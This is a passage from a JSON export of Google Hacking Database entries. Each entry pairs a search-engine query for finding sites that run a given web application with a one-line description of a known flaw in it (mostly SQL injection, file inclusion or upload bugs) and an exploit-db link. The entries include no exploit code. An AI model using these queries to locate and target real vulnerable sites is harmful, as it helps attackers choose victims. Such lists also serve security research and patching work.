http://www.exploit-db.com/exploits/10671" }, { "signatureReferenceNumber": "2972", "link": "https://www.exploit-db.com/ghdb/2972/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+WebText%22", "shortDescription": "\"Powered by WebText\"", "textualDescription": "WebText 0.4.5.2 Remote Code Execution - CVE: 2006-6856: http://www.exploit-db.com/exploits/3036" }, { "signatureReferenceNumber": "2973", "link": "https://www.exploit-db.com/ghdb/2973/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Webdevelopment+Tinx-IT", "shortDescription": "Webdevelopment Tinx-IT", "textualDescription": "WebVision 2.1 (news.php n) Remote SQL Injection: http://www.exploit-db.com/exploits/9193" }, { "signatureReferenceNumber": "2975", "link": "https://www.exploit-db.com/ghdb/2975/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22PHPGlossar+Version+0.8%22", "shortDescription": "\"PHPGlossar Version 0.8\"", "textualDescription": "PHPGlossar 0.8 (format_menue) Remote File Inclusion Vulnerabilities - CVE: 2007-2751: http://www.exploit-db.com/exploits/3941" }, { "signatureReferenceNumber": "2976", "link": "https://www.exploit-db.com/ghdb/2976/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=com_ijoomla_rss", "shortDescription": "com_ijoomla_rss", "textualDescription": "Joomla Component com_ijoomla_rss Blind SQL Injection - CVE: 2009-2099: http://www.exploit-db.com/exploits/8959" }, { "signatureReferenceNumber": "2977", "link": "https://www.exploit-db.com/ghdb/2977/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22%3Fpilih%3Dforum%22", "shortDescription": "inurl:\"?pilih=forum\"", "textualDescription": "AuraCMS [Forum Module] Remote SQL Injection Vulnerability - CVE: 2007-4171: http://www.exploit-db.com/exploits/4254" }, { "signatureReferenceNumber": "2978", "link": "https://www.exploit-db.com/ghdb/2978/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Developed+by+Infoware+Solutions%22", "shortDescription": "\"Developed by Infoware Solutions\"", "textualDescription": "infoware SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12714" }, { "signatureReferenceNumber": "2979", "link": "https://www.exploit-db.com/ghdb/2979/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by:+MyPHP+Forum%22", "shortDescription": "\"Powered by: MyPHP Forum\"", "textualDescription": "MyPHP Forum" }, { "signatureReferenceNumber": "2981", "link": "https://www.exploit-db.com/ghdb/2981/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Ayemsis+Emlak+Pro", "shortDescription": "Ayemsis Emlak Pro", "textualDescription": "Ayemsis Emlak Pro (acc.mdb) Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7665" }, { "signatureReferenceNumber": "2983", "link": "https://www.exploit-db.com/ghdb/2983/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Guruscript.com", "shortDescription": "Powered by Guruscript.com", "textualDescription": "Freelancer Marketplace Script Upload Vulnerability: http://www.exploit-db.com/exploits/14390" }, { "signatureReferenceNumber": "2985", "link": "https://www.exploit-db.com/ghdb/2985/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:%22index.php%3Fmod%3Darchives%22", "shortDescription": "allinurl:\"index.php?mod=archives\"", "textualDescription": "KwsPHP Module Archives (id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5351" }, { "signatureReferenceNumber": "2986", "link": "https://www.exploit-db.com/ghdb/2986/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22index.php%3Foption%3Dcom_qcontacts%22", "shortDescription": "\"index.php?option=com_qcontacts\"", "textualDescription": "Joomla Component QContacts (com_qcontacts) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14350" }, { "signatureReferenceNumber": "2987", "link": "https://www.exploit-db.com/ghdb/2987/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%C2%A9+Powered+by+sijio+-+Community+Software", "shortDescription": "\u00a9 Powered by sijio - Community Software", "textualDescription": "Sijio Community Software SQL Injection/Persistent XSS Vulnerability - CVE: 2010-2696: http://www.exploit-db.com/exploits/14260" }, { "signatureReferenceNumber": "2988", "link": "https://www.exploit-db.com/ghdb/2988/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+By+CrownWeb.net!%22+inurl:%22page.cfm%22", "shortDescription": "\"Powered By CrownWeb.net!\" inurl:\"page.cfm\"", "textualDescription": "crownweb (page.cfm) Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11299" }, { "signatureReferenceNumber": "2989", "link": "https://www.exploit-db.com/ghdb/2989/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Copyright+%40+2007+Powered+By+Hot+or+Not+Clone+by+Jnshosts.com+Rate+My+Pic+::+Home+::+Advertise+::+Contact+us::", "shortDescription": "Copyright @ 2007 Powered By Hot or Not Clone by Jnshosts.com Rate My Pic :: Home :: Advertise :: Contact us::", "textualDescription": "Hot or Not Clone by Jnshosts.com Database Backup Dump Vulnerability - CVE: 2007-6603: http://www.exploit-db.com/exploits/4804" }, { "signatureReferenceNumber": "2990", "link": "https://www.exploit-db.com/ghdb/2990/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+TextAds+2.08", "shortDescription": "Powered by TextAds 2.08", "textualDescription": "idevspot Text ads 2.08 sqli vulnerability - CVE: 2010-2319: http://www.exploit-db.com/exploits/13749" }, { "signatureReferenceNumber": "2991", "link": "https://www.exploit-db.com/ghdb/2991/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/com_chronocontact", "shortDescription": "inurl:/com_chronocontact", "textualDescription": "Joomla Component ChronoForms 2.3.5 RFI Vulnerabilities - CVE: 2008-0567: http://www.exploit-db.com/exploits/5020" }, { "signatureReferenceNumber": "2994", "link": "https://www.exploit-db.com/ghdb/2994/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_kochsuite%22", "shortDescription": "inurl:\"com_kochsuite\"", "textualDescription": "Joomla Kochsuite Component 0.9.4 Remote File Include Vulnerability - CVE: 2006-4348: http://www.exploit-db.com/exploits/2215" }, { "signatureReferenceNumber": "2995", "link": "https://www.exploit-db.com/ghdb/2995/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22contentPage.php%3Fid%3D%22+OR+inurl:%22displayResource.php%3Fid%3D%22+AND+intext:%22Website+by+Mile+High+Creative%22", "shortDescription": "inurl:\"contentPage.php?id=\" & inurl:\"displayResource.php?id=\" & ...", "textualDescription": "MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12792" }, { "signatureReferenceNumber": "2996", "link": "https://www.exploit-db.com/ghdb/2996/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Come+from+home+Script+(+Latest+Project+)+www.esmart-vision.com", "shortDescription": "Come from home Script ( Latest Project ) www.esmart-vision.com", "textualDescription": "Smart Vsion Script News (newsdetail) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10977" }, { "signatureReferenceNumber": "2997", "link": "https://www.exploit-db.com/ghdb/2997/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_jepoll", "shortDescription": "inurl:com_jepoll", "textualDescription": "Joomla Component com_jepoll (pollid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12781" }, { "signatureReferenceNumber": "2998", "link": "https://www.exploit-db.com/ghdb/2998/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:option%3Darticles+artid", "shortDescription": "inurl:option=articles artid", "textualDescription": "Mambo Component Articles (artid) Blind SQL Injection: http://www.exploit-db.com/exploits/5935" }, { "signatureReferenceNumber": "2999", "link": "https://www.exploit-db.com/ghdb/2999/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_jembed%22", "shortDescription": "inurl:\"com_jembed\"", "textualDescription": "com_jembed (catid) Blind SQL Injection - CVE: 2010-1073: http://www.exploit-db.com/exploits/11026" }, { "signatureReferenceNumber": "3002", "link": "https://www.exploit-db.com/ghdb/3002/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+Gradman%22", "shortDescription": "\"powered by Gradman\"", "textualDescription": "Gradman 0.1.3 (agregar_info.php) Local File Inclusion - CVE: 2008-0361: http://www.exploit-db.com/exploits/4926" }, { "signatureReferenceNumber": "3003", "link": "https://www.exploit-db.com/ghdb/3003/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_bfsurvey_profree", "shortDescription": "inurl:com_bfsurvey_profree", "textualDescription": "Joomla Component BF Survey Pro Free SQL Injection - CVE: 2009-4625: http://www.exploit-db.com/exploits/9601" }, { "signatureReferenceNumber": "3005", "link": "https://www.exploit-db.com/ghdb/3005/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:option%3Dcom_cinema", "shortDescription": "inurl:option=com_cinema", "textualDescription": "Joomla component cinema SQL injection Vulnerability: http://www.exploit-db.com/exploits/13792" }, { "signatureReferenceNumber": "3006", "link": "https://www.exploit-db.com/ghdb/3006/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_jejob", "shortDescription": "inurl:com_jejob", "textualDescription": "Joomla JE Job Component com_jejob LFI Vulnerability: http://www.exploit-db.com/exploits/14063" }, { "signatureReferenceNumber": "3007", "link": "https://www.exploit-db.com/ghdb/3007/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:prog.php%3Fdwkodu%3D", "shortDescription": "inurl:prog.php?dwkodu=", "textualDescription": "Kolifa.net Download Script 1.2 (id) SQL Injection Vulnerability - CVE: 2008-4054: http://www.exploit-db.com/exploits/6310" }, { "signatureReferenceNumber": "3010", "link": "https://www.exploit-db.com/ghdb/3010/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Designed+and+powered+by+AWS+Sports%22", "shortDescription": "\"Designed and powered by AWS Sports\"", "textualDescription": "Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14645" }, { "signatureReferenceNumber": "3011", "link": "https://www.exploit-db.com/ghdb/3011/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+zomplog%22", "shortDescription": "\"powered by zomplog\"", "textualDescription": "Zomplog" }, { "signatureReferenceNumber": "3013", "link": "https://www.exploit-db.com/ghdb/3013/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Joomla+Component+com_eportfolio+Upload+Vulnerability", "shortDescription": "\"Powered by WebStudio\"", "textualDescription": "WebStudio CMS (index.php pageid) Blind SQL Injection Vulnerability - CVE: 2008-5336: http://www.exploit-db.com/exploits/7216" }, { "signatureReferenceNumber": "3014", "link": "https://www.exploit-db.com/ghdb/3014/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_eportfolio", "shortDescription": "inurl:com_eportfolio", "textualDescription": "Joomla Component com_eportfolio Upload Vulnerability: http://www.exploit-db.com/exploits/13951" }, { "signatureReferenceNumber": "3015", "link": "https://www.exploit-db.com/ghdb/3015/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22Parlic+Design%22+inurl:id", "shortDescription": "intext:\"Parlic Design\" inurl:id", "textualDescription": "parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12767" }, { "signatureReferenceNumber": "3016", "link": "https://www.exploit-db.com/ghdb/3016/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=[+Powered+by+SkaDate+dating+]", "shortDescription": "[ Powered by SkaDate dating ]", "textualDescription": "SkaDate Dating (RFI/LFI/XSS) Multiple Remote Vulnerabilities - CVE: 2009-4700: http://www.exploit-db.com/exploits/9260" }, { "signatureReferenceNumber": "3017", "link": "https://www.exploit-db.com/ghdb/3017/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_jotloader", "shortDescription": "inurl:com_jotloader", "textualDescription": "Joomla Component jotloader 1.2.1.a Blind SQL injection - CVE: 2008-2564: http://www.exploit-db.com/exploits/5737" }, { "signatureReferenceNumber": "3018", "link": "https://www.exploit-db.com/ghdb/3018/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Site+designed+and+built+Powered+by+GlobalWebTek.%22", "shortDescription": "\"Site designed and built Powered by GlobalWebTek.\"", "textualDescription": "GlobalWebTek Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12761" }, { "signatureReferenceNumber": "3019", "link": "https://www.exploit-db.com/ghdb/3019/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/wp-content/plugins/fgallery/", "shortDescription": "inurl:/wp-content/plugins/fgallery/", "textualDescription": "Wordpress plugin fGallery 2.4.1 fimrss.php SQL Injection Vulnerability - CVE: 2008-0491: http://www.exploit-db.com/exploits/4993" }, { "signatureReferenceNumber": "3021", "link": "https://www.exploit-db.com/ghdb/3021/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%C2%A9+2010+Powered+by+Subrion+CMS", "shortDescription": "\u00a9 2010 Powered by Subrion CMS", "textualDescription": "Subrion Auto Classifieds Persistent Xss Vulnerability: http://www.exploit-db.com/exploits/14391" }, { "signatureReferenceNumber": "3022", "link": "https://www.exploit-db.com/ghdb/3022/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Copyright+%C2%A92007-2009+by+Kasseler+CMS.+All+rights+reserved.", "shortDescription": "Copyright \u00a92007-2009 by Kasseler CMS. All rights reserved.", "textualDescription": "Kasseler CMS 2.0.5 => By Pass / Download Backup Vulnerability - CVE: 2009-4822: http://www.exploit-db.com/exploits/12402" }, { "signatureReferenceNumber": "3023", "link": "https://www.exploit-db.com/ghdb/3023/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Guruscript.com", "shortDescription": "Powered by Guruscript.com", "textualDescription": "Freelancers Marketplace Script Persistent XSS Vulnerability: http://www.exploit-db.com/exploits/14389" }, { "signatureReferenceNumber": "3024", "link": "https://www.exploit-db.com/ghdb/3024/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+jshop%22", "shortDescription": "\"powered by jshop\"", "textualDescription": "JShop 1.x - 2.x (page.php xPage) Local File Inclusion Vulnerability - CVE: 2008-1624: http://www.exploit-db.com/exploits/5325" }, { "signatureReferenceNumber": "3025", "link": "https://www.exploit-db.com/ghdb/3025/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+TS+Special+Edition%22", "shortDescription": "\"Powered by TS Special Edition\"", "textualDescription": "TS Special Edition v.7.0 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12645" }, { "signatureReferenceNumber": "3026", "link": "https://www.exploit-db.com/ghdb/3026/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/jobsearchengine/", "shortDescription": "inurl:/jobsearchengine/", "textualDescription": "i-netsolution Job Search Engine SQL Injection Vulnerability - CVE: 2010-2611: http://www.exploit-db.com/exploits/14079" }, { "signatureReferenceNumber": "3027", "link": "https://www.exploit-db.com/ghdb/3027/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_jgen%22", "shortDescription": "inurl:\"com_jgen\"", "textualDescription": "Joomla Component (com_jgen) SQL Injection Vulnerability - CVE: 2010-3422: http://www.exploit-db.com/exploits/14998" }, { "signatureReferenceNumber": "3028", "link": "https://www.exploit-db.com/ghdb/3028/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:inc_webblogmanager.asp", "shortDescription": "inurl:inc_webblogmanager.asp", "textualDescription": "DMXReady Blog Manager" }, { "signatureReferenceNumber": "3029", "link": "https://www.exploit-db.com/ghdb/3029/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+eLitius+Version+1.0", "shortDescription": "Powered by eLitius Version 1.0", "textualDescription": "eLitius 1.0 (manage-admin.php) Add Admin/Change Password: http://www.exploit-db.com/exploits/8459" }, { "signatureReferenceNumber": "3030", "link": "https://www.exploit-db.com/ghdb/3030/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_n-forms", "shortDescription": "inurl:com_n-forms", "textualDescription": "Joomla Component n-forms 1.01 Blind SQL Injection: http://www.exploit-db.com/exploits/6055" }, { "signatureReferenceNumber": "3032", "link": "https://www.exploit-db.com/ghdb/3032/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:index.php%3Foption%3Dcom_races+%22raceId%22", "shortDescription": "inurl:index.php?option=com_races \"raceId\"", "textualDescription": "Joomla Component com_races Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11710" }, { "signatureReferenceNumber": "3034", "link": "https://www.exploit-db.com/ghdb/3034/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+gelato+cms%22", "shortDescription": "\"powered by gelato cms\"", "textualDescription": "Gelato (index.php post) Remote SQL Injectio - CVE: 2007-4918: http://www.exploit-db.com/exploits/4410" }, { "signatureReferenceNumber": "3035", "link": "https://www.exploit-db.com/ghdb/3035/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22cont_form.php%3Fcf_id%3D%22", "shortDescription": "inurl:\"cont_form.php?cf_id=\"", "textualDescription": "WebDM CMS SQL Injection Vulnerability - CVE: 2010-2689: http://www.exploit-db.com/exploits/14123" }, { "signatureReferenceNumber": "3036", "link": "https://www.exploit-db.com/ghdb/3036/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:links.php%3Ft%3Dsearch", "shortDescription": "allinurl:links.php?t=search", "textualDescription": "phpBB Links MOD 1.2.2 Remote SQL Injection - CVE: 2007-4653: http://www.exploit-db.com/exploits/4346" }, { "signatureReferenceNumber": "3038", "link": "https://www.exploit-db.com/ghdb/3038/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_dateconverter%22", "shortDescription": "inurl:\"com_dateconverter\"", "textualDescription": "Joomla Component com_dateconverter 0.1 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14154" }, { "signatureReferenceNumber": "3040", "link": "https://www.exploit-db.com/ghdb/3040/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_simplefaq%22", "shortDescription": "inurl:\"com_simplefaq\"", "textualDescription": "Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability - CVE: 2010-0632CVE: 2010-0632: http://www.exploit-db.com/exploits/11294" }, { "signatureReferenceNumber": "3042", "link": "https://www.exploit-db.com/ghdb/3042/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_jb2", "shortDescription": "inurl:com_jb2", "textualDescription": "Joomla Component JooBlog 0.1.1 Blind SQL Injection - CVE: 2008-2630: http://www.exploit-db.com/exploits/5734" }, { "signatureReferenceNumber": "3044", "link": "https://www.exploit-db.com/ghdb/3044/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_dms%22", "shortDescription": "inurl:\"com_dms\"", "textualDescription": "Joomla Component com_dms SQL Injection Vulnerability - CVE: 2010-0800: http://www.exploit-db.com/exploits/11289" }, { "signatureReferenceNumber": "3045", "link": "https://www.exploit-db.com/ghdb/3045/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by:+profitCode%22", "shortDescription": "\"powered by: profitCode\"", "textualDescription": "PayProCart 1146078425 Multiple Remote File Include Vulnerabilities - CVE: 2006-4672: http://www.exploit-db.com/exploits/2316" }, { "signatureReferenceNumber": "3046", "link": "https://www.exploit-db.com/ghdb/3046/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/phpplanner/userinfo.php%3Fuserid%3D", "shortDescription": "inurl:/phpplanner/userinfo.php?userid=", "textualDescription": "phpplanner XSS / SQL Vulnerability: http://www.exploit-db.com/exploits/13847" }, { "signatureReferenceNumber": "3047", "link": "https://www.exploit-db.com/ghdb/3047/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22/nuke/htmltonuke.php%22+-+%22htmltonuke.php%22", "shortDescription": "\"/nuke/htmltonuke.php\" - \"htmltonuke.php\"", "textualDescription": "PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln: http://www.exploit-db.com/exploits/3524" }, { "signatureReferenceNumber": "3048", "link": "https://www.exploit-db.com/ghdb/3048/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+UGiA+PHP+UPLOADER+V0.2", "shortDescription": "Powered by UGiA PHP UPLOADER V0.2", "textualDescription": "UGiA PHP UPLOADER V0.2 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11261" }, { "signatureReferenceNumber": "3049", "link": "https://www.exploit-db.com/ghdb/3049/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+iBoutique+v4.0", "shortDescription": "Powered by iBoutique v4.0", "textualDescription": "iBoutique 4.0 (cat) Remote SQL Injection Vulnerability - CVE: 2008-4354: http://www.exploit-db.com/exploits/6444" }, { "signatureReferenceNumber": "3050", "link": "https://www.exploit-db.com/ghdb/3050/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+ClanAdmin+Tools+v1.4.2%22", "shortDescription": "\"Powered by ClanAdmin Tools v1.4.2\"", "textualDescription": "ClanWeb 1.4.2 Remote Change Password / Add Admin: http://www.exploit-db.com/exploits/8717" }, { "signatureReferenceNumber": "3051", "link": "https://www.exploit-db.com/ghdb/3051/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22index.php%3Foption%3Dcom_expose%22", "shortDescription": "\"index.php?option=com_expose\"", "textualDescription": "Joomla Component Expose RC35 Remote File Upload Vulnerability - CVE: 2007-3932: http://www.exploit-db.com/exploits/4194" }, { "signatureReferenceNumber": "3052", "link": "https://www.exploit-db.com/ghdb/3052/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:yvcomment", "shortDescription": "inurl:yvcomment", "textualDescription": "Joomla Component yvcomment 1.16 Blind SQL Injection - CVE: 2008-2692: http://www.exploit-db.com/exploits/5755" }, { "signatureReferenceNumber": "3053", "link": "https://www.exploit-db.com/ghdb/3053/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+osCommerce+|+Customized+by+EZ-Oscommerce", "shortDescription": "Powered by osCommerce | Customized by EZ-Oscommerce", "textualDescription": "EZ-Oscommerce 3.1 Remote File Upload: http://www.exploit-db.com/exploits/14415" }, { "signatureReferenceNumber": "3054", "link": "https://www.exploit-db.com/ghdb/3054/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22kims+Q+-+Administrator+Login+Mode%22", "shortDescription": "\"kims Q - Administrator Login Mode\"", "textualDescription": "KimsQ 040109 Multiple Remote File Include Vulnerability: http://www.exploit-db.com/exploits/11960" }, { "signatureReferenceNumber": "3055", "link": "https://www.exploit-db.com/ghdb/3055/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22coursepage.php%3Fid%3D%22+intext:%22Web+Site+design+by+:+Aim+Web+Design+Cheshire%22", "shortDescription": "inurl:\"coursepage.php?id=\" intext:\"Web Site design by : Aim Web Design Cheshire\"", "textualDescription": "Aim Web Design Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12791" }, { "signatureReferenceNumber": "3056", "link": "https://www.exploit-db.com/ghdb/3056/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+One-News", "shortDescription": "Powered by One-News", "textualDescription": "OneNews Beta 2 (XSS/HI/SQL) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/6292" }, { "signatureReferenceNumber": "3058", "link": "https://www.exploit-db.com/ghdb/3058/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+PHP+Director%22", "shortDescription": "\"Powered by PHP Director\"", "textualDescription": "PHPDirector" }, { "signatureReferenceNumber": "3059", "link": "https://www.exploit-db.com/ghdb/3059/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Webdesign+Cosmos+Solutions%22", "shortDescription": "\"Webdesign Cosmos Solutions\"", "textualDescription": "Cosmos Solutions cms SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12793" }, { "signatureReferenceNumber": "3061", "link": "https://www.exploit-db.com/ghdb/3061/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_hestar%22", "shortDescription": "inurl:\"com_hestar\"", "textualDescription": "Mambo Component com_hestar Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/9609" }, { "signatureReferenceNumber": "3062", "link": "https://www.exploit-db.com/ghdb/3062/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+NovaBoard+v1.0.0%22", "shortDescription": "\"Powered by NovaBoard v1.0.0\"", "textualDescription": "NovaBoard 1.0.0 Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/8063" }, { "signatureReferenceNumber": "3063", "link": "https://www.exploit-db.com/ghdb/3063/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:es_offer.php%3Ffiles_dir%3D", "shortDescription": "inurl:es_offer.php?files_dir=", "textualDescription": "Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4715: http://www.exploit-db.com/exploits/4352" }, { "signatureReferenceNumber": "3065", "link": "https://www.exploit-db.com/ghdb/3065/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:index.php%3Foption%3Dcom_joomlaconnect_be", "shortDescription": "inurl:index.php?option=com_joomlaconnect_be", "textualDescription": "Joomla Component com_joomlaconnect_be Blind Injection Vulnerability: http://www.exploit-db.com/exploits/11578" }, { "signatureReferenceNumber": "3066", "link": "https://www.exploit-db.com/ghdb/3066/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+TinyPHPForum+v3.61%22", "shortDescription": "\"Powered by TinyPHPForum v3.61\"", "textualDescription": "TinyPHPForum 3.61 File Disclosure / Code Execution Vulnerabilities: http://www.exploit-db.com/exploits/8342" }, { "signatureReferenceNumber": "3068", "link": "https://www.exploit-db.com/ghdb/3068/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intitle:%22CCMS+v3.1+Demo+PW%22", "shortDescription": "intitle:\"CCMS v3.1 Demo PW\"", "textualDescription": "CCMS 3.1 Demo Remote SQL Injection - CVE: 2007-6658: http://www.exploit-db.com/exploits/4809" }, { "signatureReferenceNumber": "3070", "link": "https://www.exploit-db.com/ghdb/3070/", "category": "Advisories and Vulnerabilities", "querystring": 